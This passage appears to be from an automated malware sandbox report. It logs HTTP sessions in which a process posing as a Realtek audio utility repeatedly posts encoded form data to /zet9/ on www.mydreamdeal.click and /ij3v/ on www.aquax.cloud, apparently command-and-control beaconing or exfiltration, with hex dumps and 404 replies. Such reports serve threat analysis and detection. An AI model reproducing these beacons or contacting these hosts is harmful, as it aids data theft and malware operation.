                                                                                Data Raw: 32 57 4c 63 48 3d 72 71 6a 4e 61 44 5a 4b 66 51 46 4f 68 51 48 73 30 5a 6c 75 38 70 6b 73 54 49 68 63 30 48 6c 47 5a 76 65 37 33 36 54 58 6c 71 58 73 38 58 4c 2f 54 67 76 2f 37 58 57 58 71 4e 76 36 74 63 58 56 6b 33 36 50 46 71 4c 42 70 77 53 5a 62 56 43 62 76 35 78 46 43 6a 37 4f 6f 45 44 75 36 62 64 65 72 54 2b 34 32 74 31 79 76 6a 4b 56 33 54 6f 6f 4d 4a 72 36 34 44 77 7a 68 4e 46 33 6e 49 79 74 46 6a 33 31 4f 45 5a 38 74 2f 50 77 77 43 6a 5a 72 72 79 70 4a 57 30 61 43 76 6c 7a 7a 59 62 47 33 44 59 79 59 55 77 30 75 2b 79 48 6e 75 51 5a 4a 47 4b 4c 71 31 68 6b 62 6b 6e 33 38 50 6d 4b 6d 51 3d 3d
                                                                                Data Ascii: 2WLcH=rqjNaDZKfQFOhQHs0Zlu8pksTIhc0HlGZve736TXlqXs8XL/Tgv/7XWXqNv6tcXVk36PFqLBpwSZbVCbv5xFCj7OoEDu6bderT+42t1yvjKV3TooMJr64DwzhNF3nIytFj31OEZ8t/PwwCjZrrypJW0aCvlzzYbG3DYyYUw0u+yHnuQZJGKLq1hkbkn38PmKmQ==
                                                                                Nov 25, 2024 11:59:57.977562904 CET1036INHTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 10:59:57 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: no-cache, no-store, must-revalidate
                                                                                Expires: Mon, 25 Nov 2024 10:59:57 GMT
                                                                                Vary: Accept-Encoding
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2BlcERhqQk9RlhzyjWzAAE9rhWX%2BitvaK25Gpcx6a%2FsEuMyVoWV6orzoTdXy9UuaNIXI92JyfFuwXTYuTVqxBFy%2BtZWPoz6ASZZuApMQKrZnxIrJwYcOmy1DLRM5b79Q2xTRIi6RG1I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e8121dd69ce8c45-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97378&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=733&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a
                                                                                Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h
                                                                                Nov 25, 2024 11:59:57.977572918 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                39192.168.11.2049780104.21.27.59807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:00:00.242579937 CET753OUTPOST /zet9/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.mydreamdeal.click
                                                                                Origin: http://www.mydreamdeal.click
                                                                                Referer: http://www.mydreamdeal.click/zet9/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 72 71 6a 4e 61 44 5a 4b 66 51 46 4f 67 77 58 73 34 65 4a 75 39 4a 6b 76 4b 6f 68 63 6a 58 6b 50 5a 76 61 37 33 37 48 39 6c 35 7a 73 38 79 33 2f 63 43 58 2f 38 58 57 58 35 4e 75 79 70 63 58 63 6b 33 33 38 46 6f 66 42 70 77 47 5a 62 52 47 62 76 4f 46 4b 44 7a 37 51 77 30 44 73 30 37 64 65 72 54 2b 34 32 74 68 63 76 67 36 56 33 67 77 6f 4b 74 66 35 78 6a 77 77 69 4e 46 33 6a 49 79 70 46 6a 33 48 4f 42 41 5a 74 39 48 77 77 48 66 5a 6f 36 79 71 48 57 31 52 66 66 6b 5a 38 37 69 2f 35 67 30 35 4a 7a 6f 53 75 4e 32 7a 6d 34 64 44 55 30 2b 76 70 6d 39 57 66 55 65 66 2b 4e 6e 52 37 62 5a 70 79 51 6c 68 34 37 45 59 72 72 6d 30 66 54 50 32 69 4f 77 3d
                                                                                Data Ascii: 2WLcH=rqjNaDZKfQFOgwXs4eJu9JkvKohcjXkPZva737H9l5zs8y3/cCX/8XWX5NuypcXck338FofBpwGZbRGbvOFKDz7Qw0Ds07derT+42thcvg6V3gwoKtf5xjwwiNF3jIypFj3HOBAZt9HwwHfZo6yqHW1RffkZ87i/5g05JzoSuN2zm4dDU0+vpm9WfUef+NnR7bZpyQlh47EYrrm0fTP2iOw=
                                                                                Nov 25, 2024 12:00:00.604089022 CET924INHTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:00:00 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: no-cache, no-store, must-revalidate
                                                                                Expires: Mon, 25 Nov 2024 11:00:00 GMT
                                                                                Vary: Accept-Encoding
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KVDK1uosrdd8sEhT3BAWcOWWP6BY4T4cTJV0RN0H9JxLZTjUi5Q1UIRLgCvQdm535EvH574yOqATZTq4XFy2BlKj9U1POJWI1qE42%2BaLseNt%2BFYytYeaWL44TnAHBF1LGSXflghsz6Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e8121eddaa07cb2-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97727&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=753&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                                Data Ascii: f
                                                                                Nov 25, 2024 12:00:00.604137897 CET123INData Raw: 37 30 0d 0a 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36
                                                                                Data Ascii: 70\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                40192.168.11.2049781104.21.27.59807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:00:02.866661072 CET2578OUTPOST /zet9/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.mydreamdeal.click
                                                                                Origin: http://www.mydreamdeal.click
                                                                                Referer: http://www.mydreamdeal.click/zet9/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 72 71 6a 4e 61 44 5a 4b 66 51 46 4f 67 77 58 73 34 65 4a 75 39 4a 6b 76 4b 6f 68 63 6a 58 6b 50 5a 76 61 37 33 37 48 39 6c 35 37 73 38 41 50 2f 64 6a 58 2f 39 58 57 58 36 4e 75 7a 70 63 57 65 6b 33 2b 55 46 6f 6a 2f 70 79 2b 5a 61 79 65 62 34 4c 70 4b 49 7a 37 51 73 45 44 74 36 62 63 65 72 54 75 6a 32 74 78 63 76 67 36 56 33 6d 30 6f 64 70 72 35 7a 6a 77 7a 68 4e 46 7a 6e 49 79 42 46 67 47 77 4f 42 4d 6e 74 75 66 77 70 6e 76 5a 74 4d 75 71 50 57 31 54 65 66 6b 42 38 36 65 65 35 67 6f 50 4a 33 67 73 75 4f 47 7a 6c 63 63 70 4a 6e 32 53 71 47 70 45 65 6e 32 6b 79 39 6a 64 6a 61 46 65 7a 47 42 66 32 37 49 62 6f 72 61 2f 50 67 76 38 33 71 42 5a 78 41 53 2b 76 4b 48 4c 6f 67 37 73 36 4b 33 41 4b 45 62 57 77 2b 6e 63 76 41 77 33 61 4d 2b 39 30 2f 4d 78 34 67 65 64 6b 63 2b 75 47 4d 66 4f 30 38 2f 38 55 31 4d 5a 58 49 71 61 6a 76 74 6a 70 53 43 77 52 7a 2b 62 30 44 74 41 70 44 59 72 79 59 76 32 4d 6c 2b 4e 4b 4a 58 48 69 30 33 30 4d 74 33 76 44 2f 50 79 62 64 2b 68 4a 44 45 77 4c 46 2b 2b [TRUNCATED]
                                                                                Data Ascii: 2WLcH=rqjNaDZKfQFOgwXs4eJu9JkvKohcjXkPZva737H9l57s8AP/djX/9XWX6NuzpcWek3+UFoj/py+Zayeb4LpKIz7QsEDt6bcerTuj2txcvg6V3m0odpr5zjwzhNFznIyBFgGwOBMntufwpnvZtMuqPW1TefkB86ee5goPJ3gsuOGzlccpJn2SqGpEen2ky9jdjaFezGBf27Ibora/Pgv83qBZxAS+vKHLog7s6K3AKEbWw+ncvAw3aM+90/Mx4gedkc+uGMfO08/8U1MZXIqajvtjpSCwRz+b0DtApDYryYv2Ml+NKJXHi030Mt3vD/Pybd+hJDEwLF++inoGg3yc+Kyu5ORVKhjaW9QggdJ4EpDpppKxa7eOwsXexF2a4oIUrJJQfyjcNBuhtuFmz4kft9cX9+OQ6OYtOF/+EQGNYBapJWPA1Xj53YgbxyBsPw7pecpBMLsPFc2zn2W9U6Uq4aF3tbO7Zc63I7N79dwfbcYKQt7MYqYK7hk5mHo15FFChmHleEfyrmybJrnx7V4Ok99s/iuSC5/+4YsVnXywNPJDBoBDYxXaW+2yd4KBYW6BwyH0FhboXm9sMKQ0OuBi4rvoBWmESQT1C9UQ9ioihUV7JIgueITf2zXU09K1Yn4hRWiwBR3MEW781UKUKmUQ2oC7y44bKvqsp5H7n2t0juo/jUzfoO3IZPIOaY4uXyOGfLDKcAaZYlpFMPXyMdVLgjASG5Vy3IgpXP4nlpqxhN8EmhqYQKFq0rIt2yweAafsAAtzxIJeIdkMhsShMIgKp1A04YcRzqxE2yKqNapCW9YpdOCuLSIpiw/Vr8nt6jbqXVBqDJVRnSrrCj7pKpv+gv9qDOfOZQ3Op56ziKiCWtiFA9UJqt99BqYn9EEyBMASmf8LOlk1wt/cwW/sBQqk+fPHsU7PdARd5U+ukkRFkLO0EdnfsmjN6fZoU4UwNf0iT4oIgtbCHMFP4Ku1xdljDbiPRMYok9qahA+t22oGxY3Akc [TRUNCATED]
                                                                                Nov 25, 2024 12:00:02.866684914 CET2578OUTData Raw: 44 6b 74 44 59 46 33 6f 71 2f 2f 33 48 75 50 76 6b 6e 56 4d 74 33 6e 71 4b 64 4e 31 72 71 6a 70 7a 4f 76 6d 70 64 6d 71 64 58 49 54 45 6a 62 4d 35 47 54 66 67 38 62 6a 77 47 65 50 73 70 63 31 4c 49 69 43 62 52 7a 68 52 62 5a 57 4c 6b 33 73 45 63
                                                                                Data Ascii: DktDYF3oq//3HuPvknVMt3nqKdN1rqjpzOvmpdmqdXITEjbM5GTfg8bjwGePspc1LIiCbRzhRbZWLk3sEc5/A1FCDfgslrTZVOb5Wet46ZG78wN/SRi8tP7xZmAjUfxrgCzDAwXrwcjWDVVoMDyHrgtSXt30KVXi0KJEJ8K0caw7UbstGNkfaJ3XnZWKwnqNs42Gdqd1NlOKv/Idvo2VW1zySXw3/DCpzFjBjj/nOjJjazGxw1q
                                                                                Nov 25, 2024 12:00:02.866760969 CET2746OUTData Raw: 46 69 4b 66 2b 58 5a 34 78 4d 76 7a 65 56 52 48 51 32 7a 53 68 4a 57 4e 55 4e 6d 4e 4d 6c 73 72 41 43 63 77 41 74 52 37 2f 35 74 54 55 2b 6f 50 48 52 57 4e 4d 58 35 36 34 42 4c 50 61 31 61 42 53 32 69 66 2f 44 56 75 65 6b 5a 30 7a 34 78 74 75 62
                                                                                Data Ascii: FiKf+XZ4xMvzeVRHQ2zShJWNUNmNMlsrACcwAtR7/5tTU+oPHRWNMX564BLPa1aBS2if/DVuekZ0z4xtub4wfxtLgHOmmyj9QUeBPaVHJMxUFCWN+sHQ2m+G4yZUlPsJrQug9c6IiTCXZkXLPIVKiwbnFojdKHCdq+n8RD1/N5sZx43NUq3TRAqYe/WEcNhrdc3WNgPokPu5SiUe1huP9sWCLjSbzuQpdyHkHIm6h+qvg3ZAol1
                                                                                Nov 25, 2024 12:00:03.227453947 CET935INHTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:00:03 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: no-cache, no-store, must-revalidate
                                                                                Expires: Mon, 25 Nov 2024 11:00:03 GMT
                                                                                Vary: Accept-Encoding
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M08C4w6iHMkejvMUlOJHWgUjvlguRNdZ37PYUySoP5H%2B%2BrBkuXbwp6bh7WiL546gVhtXUUciL%2B9GBZrw3T%2FHZD%2BEA66YHq%2FMgdPPhvVbFU%2FptvI12rDszOBym05syhDfwV1kfi0youk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e8121fe3c380f73-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97079&sent=7&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7902&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                                Data Ascii: f
                                                                                Nov 25, 2024 12:00:03.227464914 CET118INData Raw: 37 30 0d 0a 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36
                                                                                Data Ascii: 70\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h
                                                                                Nov 25, 2024 12:00:03.227494955 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                41192.168.11.2049782104.21.27.59807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:00:05.489787102 CET459OUTGET /zet9/?2WLcH=moLtZ3Q2YS5/hkjwzodJ1swdKZQozUlOYqvt2cuq7Yvv9xGOVSWf5GjI0u28lvuJt3GCOLDggiamVwDKnOFVInrpmEPV2qsYzTve7f9TvzKyqWkrNPKErR0=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.mydreamdeal.click
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:00:05.860534906 CET882INHTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:00:05 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: no-cache, no-store, must-revalidate
                                                                                Expires: Mon, 25 Nov 2024 11:00:05 GMT
                                                                                Vary: Accept-Encoding
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fq6BqqEdoWpQ9ntbbyo3mXRnTIHHj600qh9DMlw8R1mUoIKNdBa6xg2idEcpxY1qEeXPltAXDsD9TYCT3%2BtYl%2BTmPHK5DIpZrLWGpqPeMeC71y3ChD9ii8gnVEs4IM0y%2B0ohaeMT4h0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e81220e9c19c454-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97126&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=459&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Nov 25, 2024 12:00:05.860546112 CET153INData Raw: 39 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f
                                                                                Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>
                                                                                Nov 25, 2024 12:00:05.860553980 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                42192.168.11.204978345.81.23.25807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:00:11.234292984 CET715OUTPOST /ij3v/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.aquax.cloud
                                                                                Origin: http://www.aquax.cloud
                                                                                Referer: http://www.aquax.cloud/ij3v/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 55 33 41 37 36 61 68 55 71 79 43 4d 61 62 6e 70 41 30 76 7a 53 68 31 53 70 6c 74 36 31 31 30 64 50 5a 6a 43 78 6b 73 72 73 6e 77 4b 67 74 34 77 4c 76 30 64 32 36 57 2b 47 68 45 67 78 32 71 43 65 30 74 4f 46 41 53 36 77 37 74 78 2f 6a 41 41 50 71 72 66 75 44 37 57 52 39 64 6b 35 78 32 35 2b 35 70 7a 56 70 69 59 70 34 68 57 7a 36 36 6d 7a 46 74 63 47 39 47 6f 50 49 59 66 77 59 38 77 6a 47 76 63 50 50 69 77 64 2f 70 76 71 6b 59 77 51 65 36 65 2b 47 39 49 4b 43 4a 32 4c 56 51 55 61 2f 63 64 57 75 30 74 51 6d 7a 56 4c 38 64 67 2f 77 4c 35 55 30 56 57 53 73 69 61 77 70 6c 4c 73 77 3d 3d
                                                                                Data Ascii: 2WLcH=U3A76ahUqyCMabnpA0vzSh1Splt6110dPZjCxksrsnwKgt4wLv0d26W+GhEgx2qCe0tOFAS6w7tx/jAAPqrfuD7WR9dk5x25+5pzVpiYp4hWz66mzFtcG9GoPIYfwY8wjGvcPPiwd/pvqkYwQe6e+G9IKCJ2LVQUa/cdWu0tQmzVL8dg/wL5U0VWSsiawplLsw==
                                                                                Nov 25, 2024 12:00:11.407145023 CET413INHTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:00:11 GMT
                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                                                                                Content-Length: 203
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6a 33 76 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ij3v/ was not found on this server.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                43192.168.11.204978445.81.23.25807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:00:13.941138029 CET735OUTPOST /ij3v/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.aquax.cloud
                                                                                Origin: http://www.aquax.cloud
                                                                                Referer: http://www.aquax.cloud/ij3v/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 55 33 41 37 36 61 68 55 71 79 43 4d 62 34 76 70 47 58 48 7a 54 42 31 4e 73 6c 74 36 2f 56 30 52 50 5a 76 43 78 67 30 37 74 52 41 4b 67 4d 49 77 49 74 51 64 33 36 57 2b 65 52 45 68 2f 57 71 4a 65 30 68 47 46 43 32 36 77 34 52 78 2f 68 59 41 4f 5a 44 59 68 7a 37 55 58 39 64 63 33 52 32 35 2b 35 70 7a 56 6f 43 69 70 34 35 57 77 4b 4b 6d 78 6e 4a 66 46 39 47 72 66 34 59 66 30 59 38 30 6a 47 76 69 50 4b 44 72 64 35 6c 76 71 6e 4d 77 51 4e 69 42 78 47 39 53 55 79 4a 6c 4c 32 68 4e 57 4e 51 32 47 2f 49 4c 57 6b 6e 78 4b 71 51 36 69 43 2f 64 58 6e 4a 6b 57 63 62 79 79 72 6b 51 78 34 7a 76 2f 48 2f 53 73 64 46 76 61 37 4d 69 48 37 56 6b 30 77 6b 3d
                                                                                Data Ascii: 2WLcH=U3A76ahUqyCMb4vpGXHzTB1Nslt6/V0RPZvCxg07tRAKgMIwItQd36W+eREh/WqJe0hGFC26w4Rx/hYAOZDYhz7UX9dc3R25+5pzVoCip45WwKKmxnJfF9Grf4Yf0Y80jGviPKDrd5lvqnMwQNiBxG9SUyJlL2hNWNQ2G/ILWknxKqQ6iC/dXnJkWcbyyrkQx4zv/H/SsdFva7MiH7Vk0wk=
                                                                                Nov 25, 2024 12:00:14.113862991 CET413INHTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:00:14 GMT
                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                                                                                Content-Length: 203
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6a 33 76 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ij3v/ was not found on this server.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                44192.168.11.204978545.81.23.2580
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:00:16.649075031 CET2578OUTPOST /ij3v/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.aquax.cloud
                                                                                Origin: http://www.aquax.cloud
                                                                                Referer: http://www.aquax.cloud/ij3v/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 55 33 41 37 36 61 68 55 71 79 43 4d 62 34 76 70 47 58 48 7a 54 42 31 4e 73 6c 74 36 2f 56 30 52 50 5a 76 43 78 67 30 37 74 52 49 4b 67 65 77 77 49 4d 51 64 77 36 57 2b 41 68 45 6b 2f 57 71 49 65 33 52 34 46 43 37 48 77 39 56 78 35 45 45 41 4a 6f 44 59 32 44 37 55 56 39 64 6e 35 78 32 67 2b 35 35 33 56 70 75 69 70 34 35 57 77 4d 47 6d 31 31 74 66 44 39 47 6f 50 49 59 70 77 59 39 68 6a 47 33 55 50 4b 33 37 63 4a 46 76 7a 48 63 77 57 2b 47 42 38 47 39 55 56 79 49 34 4c 32 74 6f 57 4f 6b 36 47 38 55 31 57 6e 33 78 49 72 4e 43 31 77 6d 46 56 58 46 42 61 66 6a 31 30 61 6f 6b 34 62 48 4f 35 32 6e 47 7a 4b 74 6e 59 4a 59 43 63 72 39 51 68 6d 66 36 6c 39 4d 75 71 43 68 6f 74 55 55 62 4f 64 64 6e 4c 69 2f 58 48 36 65 59 37 45 2f 39 46 53 48 65 4d 69 54 64 36 4c 65 33 44 6f 32 45 37 32 4d 74 58 79 6e 39 62 7a 65 63 50 42 66 35 49 43 78 74 66 4c 65 72 6d 6a 4e 6e 6d 59 41 4a 35 32 74 7a 52 45 57 70 44 66 51 55 31 38 6f 58 58 36 4c 75 79 6e 63 4e 34 64 2f 50 63 57 72 65 68 66 70 54 45 66 4f 4f [TRUNCATED]
